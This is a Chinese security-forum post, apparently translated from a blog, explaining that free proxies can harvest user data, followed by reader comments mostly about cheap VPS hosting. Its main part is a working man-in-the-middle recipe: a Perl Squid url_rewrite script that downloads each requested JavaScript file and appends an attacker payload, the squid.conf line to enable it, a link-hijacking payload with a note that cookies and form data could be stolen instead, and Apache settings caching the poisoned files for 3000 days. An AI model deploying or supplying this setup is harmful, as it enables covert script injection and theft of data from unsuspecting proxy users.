为什么会有免费代理?

  • A+
所属分类:WooYun-Zone

因为这是一个很简单就可以收集用户数据的方法。

所有的工作都是可以通过修改SQUID配置达到。

1.[Server] 在linux服务器上安装Squid服务。

2.[Payload] 修改服务端配把所有的javascript文件都加上一段我们自己的代码。

3.[Cache] 修改.js文件的缓存时间。

作者搭建了一个代理服务器,过了几天有超过5000个人用他的代理,大多数的人是用来做坏的事情,但是他们没有想到的是,代理服务器也可以对他们做坏的事情。

做你自己的植入js文件的代理服务器

除了你自己的squid代理服务器外,你还需要一个web服务器,这里用Apache为例:

1.创建payload,这里只是修改a标签连接为例,实际过程可以偷取cookie,获取提交表单内容等。

for(var i=0;i<document.getElementsByTagName('a').length;i++)  

   document.getElementsByTagName('a')[i].href = "https://blog.haschek.at";

2.写squid脚本文件,来修改所有的.js文件:

/etc/squid/poison.pl

#!/usr/bin/perl

$|=1;

$count = 0;

$pid = $$;

while(<>)

{

  chomp $_;

  if($_ =- /(.*\.js)/i)

  {

        $url = $1;

        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");

        system("chmod o+r /var/www/tmp/$pid-$count.js");

        system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");

        print "http://127.0.0.1:80/tmp/$pid-$count.js\n";

  }

  else

  {

        print "$_\n";

  }

$count++;

}

脚本用wget获取页面原始的javascript文件,然后吧/etc/squid/payload.js文件添加进去,修改后的文件返回到客户端,同时你需要创建/var/www/tmp目录,并允许squid在其中写文件。这个目录存修改后的js文件。

3.告诉squid使用该脚本

在/etc/squid/squid.conf中添加

url_rewrite_program /etc/squid/poison.pl

4.设置js文件缓存时间

/var/www/tmp/.htaccess

ExpiresActive On

ExpiresDefault "access plus 3000 days"

告诉Apache服务器设置超长缓存时间,除非客户端清除浏览器缓存。

from:https://blog.haschek.at/post/fd9bc

  1. 1#

    ddy (其实第一次要我挖洞我是拒绝的。因为,你不能让我挖,) | 2015-01-04 12:20

    好极了,我要开几块钱一个月的独立IP机子做代理IP 免费的

  2. 2#

    啊L川 | 2015-01-04 12:21

    地板

  3. 3#

    0×12 (帽子掉了|多逛,少说话。|小学生                                                                                                                                                                                                                                               ) | 2015-01-04 12:23

    看看

  4. 4#

    flying ((ส้้้้้้้้้้้้้้้้้้้้้้้) | 2015-01-04 12:26

    @ddy 那里能买到几块钱一个月的。

  5. 5#

    ddy (其实第一次要我挖洞我是拒绝的。因为,你不能让我挖,) | 2015-01-04 12:36

    @flying 忘了,国外有一家,30块软妹币可以买一年,不限带宽 流量300G 128内存 4G ssd G口 独立IP

  6. 6#

    刘海哥 (‮moc.ghuil.www) | 2015-01-04 12:44

    @ddy 求地址啊

  7. 7#

    暴暴 | 2015-01-04 12:53

    @ddy 这家好像速度根本没法用。。

  8. 8#

    RainShine (I’m your angel of music.) | 2015-01-04 12:59

    貌似之前乌云有关于这个的一个讨论帖。

  9. 9#

    Neeke | 2015-01-04 13:05

    @ddy @刘海哥 @flying
    https://bandwagonhost.com/cart.php
    最便宜的:
    Micro-64
    Self-managed
    HDD: 1.5 GB
    RAM: 64 MB
    CPU: 1x Intel Xeon
    BW: 100 GB/mo
      $3.99 USD Annually

  10. 10#

    DM_ (http://x0day.me) | 2015-01-04 14:59

    各种手机端的免费vpn。

    话说Nginx配反代比squid要好用点。

  11. 11#

    zeracker | 2015-01-04 15:21

    @Neeke @ddy 这广告打得。。 @mujj

  12. 12#

    爱捣蛋的鬼 | 2015-01-04 15:41

    只在虚拟机里面和隐身模式玩

  13. 13#

    爱捣蛋的鬼 | 2015-01-04 15:43

    想想红杏。。

  14. 14#

    wefgod (求大牛指点) | 2015-01-04 15:49

    靠,原来是收集用户数据用的啊,明白了

  15. 15#

    ddy (其实第一次要我挖洞我是拒绝的。因为,你不能让我挖,) | 2015-01-04 16:13

    @Neeke 对,就这家

  16. 16#

    Neeke | 2015-01-04 16:29

    @zeracker – -#我是图便宜在这买的 不是打广告的

  17. 17#

    Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2015-01-04 16:46

    @ddy @Neeke @zeracker 不用担心,这家的CPU使用率不会让你编译成功squid的.

  18. 18#

    mramydnei (一个逗逼运维) | 2015-01-04 16:50

    这个确实好玩,之前在securitytube看过一个西班牙人的演讲。钓到各种有趣的邮件内容

  19. 19#

    ddy (其实第一次要我挖洞我是拒绝的。因为,你不能让我挖,) | 2015-01-04 18:14

    @Mujj 大神!给个你的QQ给我,感觉加你,会让我涨姿势,IDC类的。。

  20. 20#

    Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2015-01-04 18:14

    @ddy 236588129

  21. 21#

    ddy (其实第一次要我挖洞我是拒绝的。因为,你不能让我挖,) | 2015-01-04 18:16

    @Mujj 机佬你好。。

  22. 22#

    刘海哥 (‮moc.ghuil.www) | 2015-01-04 18:36

    @Neeke 谢谢啊

  23. 23#

    Manning (MSpider作者) | 2015-01-04 18:49

    那代理真挺可怕的哦

  24. 24#

    zzzzy (我已然别无所求) | 2015-01-04 20:59

    我记得原来优酷还是土豆的播放器有个端口就是开代理的    当年好多人扫

  25. 25#

    最热微博 (((‮data;))) | 2015-01-04 21:52

    思路高

  26. 26#

    付弘雪 | 2015-01-05 00:47

    @Mujj 你家有欧洲的vps吗?

  27. 27#

    Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2015-01-05 02:33

    @付弘雪 有服务器